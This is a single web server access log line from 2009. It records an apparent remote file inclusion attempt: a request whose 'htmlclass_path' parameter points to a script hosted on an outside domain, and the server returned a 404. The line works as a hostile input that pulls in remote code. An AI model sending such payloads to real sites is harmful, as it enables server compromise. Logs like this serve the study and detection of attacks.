209.200.237.152 - - [08/Nov/2009:18:54:06 -0800] "GET /logs/access_090629.log/phphtml.php?htmlclass_path=http://prety1.fileave.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
